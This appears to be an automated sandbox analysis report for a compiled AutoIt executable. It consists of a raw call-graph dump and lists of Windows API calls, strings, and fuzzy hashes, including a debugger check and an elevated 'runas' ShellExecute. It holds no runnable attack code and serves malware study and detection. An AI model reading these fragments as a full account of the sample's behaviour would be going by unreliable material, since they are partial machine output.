94978->94948 94980 7ff656004ee1 _onexit 94979->94980 94981 7ff656004eeb 94979->94981 94980->94951 94983 7ff65601ab08 34 API calls _onexit 94981->94983 94983->94980 94984->94956 94985->94959 94986->94961 94987->94972 94989 7ff65601b3c5 RtlFreeHeap 94988->94989 94993 7ff65601b3f5 __free_lconv_num 94988->94993 94990 7ff65601b3e0 94989->94990 94989->94993 94994 7ff6560155d4 15 API calls _invalid_parameter_noinfo 94990->94994 94992 7ff65601b3e5 GetLastError 94992->94993 94993->94969 94994->94992 95015 7ff655fe7ec0 94995->95015 94997 7ff655fe106d 94998 7ff656004ebc _onexit 34 API calls 94997->94998 94999 7ff656004f15 94998->94999 94999->94864 95099 7ff655fe7718 95000->95099 95003 7ff656004ebc _onexit 34 API calls 95004 7ff656004f15 95003->95004 95004->94864 95117 7ff655fe7920 95005->95117 95007 7ff655fe109e 95008 7ff656004ebc _onexit 34 API calls 95007->95008 95009 7ff656004f15 95008->95009 95009->94864 95180 7ff656001d80 95010->95180 95013 7ff656004ebc _onexit 34 API calls 95014 7ff656004f15 95013->95014 95014->94864 95051 7ff655fe82b4 95015->95051 95018 7ff655fe82b4 4 API calls 95019 7ff655fe7f3a 95018->95019 95020 7ff655fe9640 4 API calls 95019->95020 95021 7ff655fe7f46 95020->95021 95022 7ff655fe7cf4 4 API calls 95021->95022 95023 7ff655fe7f59 95022->95023 95058 7ff656002d5c 6 API calls 95023->95058 95025 7ff655fe7fa5 95026 7ff655fe9640 4 API calls 95025->95026 95027 7ff655fe7fb1 95026->95027 95028 7ff655fe9640 4 API calls 95027->95028 95029 7ff655fe7fbd 95028->95029 95030 7ff655fe9640 4 API calls 95029->95030 95031 7ff655fe7fc9 95030->95031 95032 7ff655fe9640 4 API calls 95031->95032 95033 7ff655fe800f 95032->95033 95034 7ff655fe9640 4 API calls 95033->95034 95035 7ff655fe80f7 95034->95035 95059 7ff655ffef88 95035->95059 95037 7ff655fe8103 95066 7ff655ffeec8 95037->95066 95039 7ff655fe812f 95040 7ff655fe9640 4 API calls 95039->95040 95041 7ff655fe813b 95040->95041 95077 7ff655ff6d40 95041->95077 95045 7ff655fe81ac 95046 7ff655fe81be GetStdHandle 95045->95046 95047 
7ff655fe8220 OleInitialize 95046->95047 95048 7ff65602d350 95046->95048 95047->94997 95094 7ff65605ffc8 CreateThread 95048->95094 95050 7ff65602d367 CloseHandle 95052 7ff655fe9640 4 API calls 95051->95052 95053 7ff655fe82c6 95052->95053 95054 7ff655fe9640 4 API calls 95053->95054 95055 7ff655fe82cf 95054->95055 95056 7ff655fe9640 4 API calls 95055->95056 95057 7ff655fe7f2e 95056->95057 95057->95018 95058->95025 95060 7ff655fe9640 4 API calls 95059->95060 95061 7ff655ffefa3 95060->95061 95062 7ff655fe9640 4 API calls 95061->95062 95063 7ff655ffefac 95062->95063 95064 7ff655fe9640 4 API calls 95063->95064 95065 7ff655fff02e 95064->95065 95065->95037 95067 7ff655ffeede 95066->95067 95068 7ff655fe9640 4 API calls 95067->95068 95069 7ff655ffeeea 95068->95069 95070 7ff655fe9640 4 API calls 95069->95070 95071 7ff655ffeef6 95070->95071 95072 7ff655fe9640 4 API calls 95071->95072 95073 7ff655ffef02 95072->95073 95074 7ff655fe9640 4 API calls 95073->95074 95075 7ff655ffef0e 95074->95075 95076 7ff655ffef68 RegisterWindowMessageW 95075->95076 95076->95039 95078 7ff655ff6d80 95077->95078 95079 7ff655ff6db9 95077->95079 95080 7ff655fe816b 95078->95080 95096 7ff656005114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95078->95096 95095 7ff656005114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95079->95095 95087 7ff6560039a8 95080->95087 95088 7ff65604a502 95087->95088 95089 7ff6560039cc 95087->95089 95097 7ff655feee20 5 API calls Concurrency::wait 95088->95097 95089->95045 95091 7ff65604a50e 95098 7ff655feee20 5 API calls Concurrency::wait 95091->95098 95093 7ff65604a52d 95094->95050 95097->95091 95098->95093 95100 7ff655fe9640 4 API calls 95099->95100 95101 7ff655fe778f 95100->95101 95106 7ff655fe6f24 95101->95106 95104 7ff655fe782c 95105 7ff655fe1051 95104->95105 95109 7ff655fe7410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 
memcpy_s 95104->95109 95105->95003 95110 7ff655fe6f60 95106->95110 95109->95104 95111 7ff655fe6f85 95110->95111 95112 7ff655fe6f52 95110->95112 95111->95112 95113 7ff655fe6f93 RegOpenKeyExW 95111->95113 95112->95104 95113->95112 95114 7ff655fe6faf RegQueryValueExW 95113->95114 95115 7ff655fe6ff5 RegCloseKey 95114->95115 95116 7ff655fe6fdd 95114->95116 95115->95112 95116->95115 95118 7ff655fe7948 wcsftime 95117->95118 95119 7ff655fe9640 4 API calls 95118->95119 95120 7ff655fe7a02 95119->95120 95147 7ff655fe5680 95120->95147 95122 7ff655fe7a0c 95154 7ff656003a38 95122->95154 95125 7ff655fe71f8 4 API calls 95126 7ff655fe7a2c 95125->95126 95160 7ff655fe4680 95126->95160 95128 7ff655fe7a3d 95129 7ff655fe9640 4 API calls 95128->95129 95130 7ff655fe7a47 95129->95130 95164 7ff655fea854 95130->95164 95133 7ff655fe7a83 Concurrency::wait 95133->95007 95134 7ff65602d05c RegQueryValueExW 95135 7ff65602d131 RegCloseKey 95134->95135 95136 7ff65602d08f 95134->95136 95135->95133 95146 7ff65602d147 wcscat Concurrency::wait 95135->95146 95137 7ff656004c68 4 API calls 95136->95137 95139 7ff65602d0b2 95137->95139 95138 7ff655fe9d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95138->95146 95140 7ff65602d0bf RegQueryValueExW 95139->95140 95141 7ff65602d0f3 95140->95141 95143 7ff65602d112 95140->95143 95142 7ff655fe7cf4 4 API calls 95141->95142 95142->95143 95143->95135 95144 7ff655feec00 4 API calls 95144->95146 95145 7ff655fe4680 4 API calls 95145->95146 95146->95133 95146->95138 95146->95144 95146->95145 95168 7ff656028f90 95147->95168 95150 7ff655feec00 4 API calls 95151 7ff655fe56b4 95150->95151 95170 7ff655fe56d4 95151->95170 95153 7ff655fe56c1 Concurrency::wait 95153->95122 95155 7ff656028f90 wcsftime 95154->95155 95156 7ff656003a44 GetFullPathNameW 95155->95156 95157 7ff656003a74 95156->95157 95158 7ff655fe7cf4 4 API calls 95157->95158 95159 7ff655fe7a1b 95158->95159 95159->95125 95161 7ff655fe469f 95160->95161 95162 7ff655fe46c8 memcpy_s 

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE37F2
                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE3807
                                                                                                                    • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE388D
                                                                                                                      • Part of subcall function 00007FF655FE3F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF655FE38BF,?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE3FFD
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF655FE3924
                                                                                                                    • MessageBoxA.USER32 ref: 00007FF65602B888
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF65602B8E1
                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,00007FF655FE3785), ref: 00007FF65602B968
                                                                                                                    • ShellExecuteW.SHELL32 ref: 00007FF65602B98F
                                                                                                                      • Part of subcall function 00007FF655FE3B84: GetSysColorBrush.USER32 ref: 00007FF655FE3B9E
                                                                                                                      • Part of subcall function 00007FF655FE3B84: LoadCursorW.USER32 ref: 00007FF655FE3BAE
                                                                                                                      • Part of subcall function 00007FF655FE3B84: LoadIconW.USER32 ref: 00007FF655FE3BC3
                                                                                                                      • Part of subcall function 00007FF655FE3B84: LoadIconW.USER32 ref: 00007FF655FE3BDC
                                                                                                                      • Part of subcall function 00007FF655FE3B84: LoadIconW.USER32 ref: 00007FF655FE3BF5
                                                                                                                      • Part of subcall function 00007FF655FE3B84: LoadImageW.USER32 ref: 00007FF655FE3C21
                                                                                                                      • Part of subcall function 00007FF655FE3B84: RegisterClassExW.USER32 ref: 00007FF655FE3C85
                                                                                                                      • Part of subcall function 00007FF655FE3CBC: CreateWindowExW.USER32 ref: 00007FF655FE3D0C
                                                                                                                      • Part of subcall function 00007FF655FE3CBC: CreateWindowExW.USER32 ref: 00007FF655FE3D5F
                                                                                                                      • Part of subcall function 00007FF655FE3CBC: ShowWindow.USER32 ref: 00007FF655FE3D75
                                                                                                                      • Part of subcall function 00007FF655FE6258: Shell_NotifyIconW.SHELL32 ref: 00007FF655FE6350
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                    • API String ID: 1593035822-3287110873
                                                                                                                    • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                                                    • Instruction ID: b531ef2969509d6d28d45c1395abaafcdc1e948f5abd03e88e8942eff0eb3f21
                                                                                                                    • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                                                                    • Instruction Fuzzy Hash: B8719065A1D68395FBA0AF20E9441FD2361BF51748F8C0132E54EE71A5DF6EEA0DC700

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                    • String ID: AU3!$EA06$SCRIPT
                                                                                                                    • API String ID: 3051347437-2925976212
                                                                                                                    • Opcode ID: 30f6ba7276d28cb9964872315e4a0112bd0f4edd02183a3a1bb8bc557d64f8ed
                                                                                                                    • Instruction ID: 875b84f5d605919cdddbfbe518e7c0b2a513aa89e73618fccb5e924eda32c4ec
                                                                                                                    • Opcode Fuzzy Hash: 30f6ba7276d28cb9964872315e4a0112bd0f4edd02183a3a1bb8bc557d64f8ed
                                                                                                                    • Instruction Fuzzy Hash: 12912A76B1964686EBA0CB21E448A7C3761FB45F98F494135DE5DAB781DF3DE808CB00

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                                    • String ID: |O
                                                                                                                    • API String ID: 1568231622-607156228
                                                                                                                    • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                                    • Instruction ID: fee56731b0f696e6c1e3e74328e2f9cda085f08a28866ea38a1f66eaf18bc083
                                                                                                                    • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                                    • Instruction Fuzzy Hash: 38D1B1A1A5D2C285FB218F20AA0497A3BA4AF61784FCC0275D58EF3665DF6FB50CC701

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1787492119-0
                                                                                                                    • Opcode ID: ddb31b1ea6ffbce714698367dc00d601beb7cc94552172ff8982eeff5935b681
                                                                                                                    • Instruction ID: dc2f380afc2abab4df6ed52674e5a2f1bd3665aacaf0612d10ed5460c28dd2df
                                                                                                                    • Opcode Fuzzy Hash: ddb31b1ea6ffbce714698367dc00d601beb7cc94552172ff8982eeff5935b681
                                                                                                                    • Instruction Fuzzy Hash: 87E1C226B08B8285EB40DF26D65417D77A1FB84B98F084536EE5DE77A9CF39E809C700
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2695905019-0
                                                                                                                    • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                    • Instruction ID: 7dda236f6465f4e6aba2b01468d4c28e97722ce7190cfdf463286331984cad9d
                                                                                                                    • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                    • Instruction Fuzzy Hash: 7EF08210E09602C1EA245B35FA083382361AF51B79F5C4334D97FA72E4DFADE49DC600

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                                    • API String ID: 2667193904-1575078665
                                                                                                                    • Opcode ID: 556029334d18f1e7f1a6bcd8ff6412e7b433a3d19d3476e5022d6bd965ae193f
                                                                                                                    • Instruction ID: b9dce2c36a085abb4d6a9c39609faf4d51b3877c20e4bcf9ac2630e38e65de9a
                                                                                                                    • Opcode Fuzzy Hash: 556029334d18f1e7f1a6bcd8ff6412e7b433a3d19d3476e5022d6bd965ae193f
                                                                                                                    • Instruction Fuzzy Hash: E2919A22A2864395EB60DF14EA401BD7374FF84758F880236E64DE3AA5DF7DD949C740

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated
                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                    • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                                    • Instruction ID: 5f3856f9bfbc82b514493eb08b6f94e36164618d2859de5a68fc8c1c1995ed36
                                                                                                                    • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                                                                    • Instruction Fuzzy Hash: 50519B35D0C64781FBB49B24EA4827E2265AF55B88F8C0631D44EF36A5DE6EF948CB00

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-2659433951
                                                                                                                    • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                                    • Instruction ID: cc038dee66b458e2fb462cd860ed98a57af77017d70f0842e48941a177731151
                                                                                                                    • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                                                                    • Instruction Fuzzy Hash: 37311632A18B018AE700CF61E9443A937B5FB48758F584239CA4EA7B64EF7ED159CB40

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                                    • String ID: close all
                                                                                                                    • API String ID: 1992507300-3243417748
                                                                                                                    • Opcode ID: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                                                                    • Instruction ID: 3f453312b7961b9db57284ff8ddbdb82222f601a5067909d5f79fbf7e152f949
                                                                                                                    • Opcode Fuzzy Hash: 898e7ad48959ea57d970830a0d3bf25c9db69e83af24dfb35c39e817a9ff6a77
                                                                                                                    • Instruction Fuzzy Hash: 90E13D25B0A94281EEA8EB16C65427C2360BF94F49F4C5035DB4EB7691DF7DEC66CB00

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                    • String ID: AutoIt v3
                                                                                                                    • API String ID: 423443420-1704141276
                                                                                                                    • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                                    • Instruction ID: 7bcdef326dd6dd18747dc53350eed8b14e14dfeac29c6f2a5bff125283287dbe
                                                                                                                    • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                                    • Instruction Fuzzy Hash: B7313936A08B028AE740CF51F9447AA3375FB48B58F484239CA8EA3B54DF7EE458C740

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1617910340-0
                                                                                                                    • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                                    • Instruction ID: e1391a6ab6d17d913a469803e0aea80aca8325ff8e73245aec2bc8bafacb58e2
                                                                                                                    • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                                    • Instruction Fuzzy Hash: 98C1BF32B18A418AEB508F65DA913BC3761FB497A8F085235DE2EAB7D5DF39D059C300

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3249950245-0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 849 7ff655fe3cbc-7ff655fe3d88 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$Show
                                                                                                                    • String ID: AutoIt v3$d$edit
                                                                                                                    • API String ID: 2813641753-2600919596

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
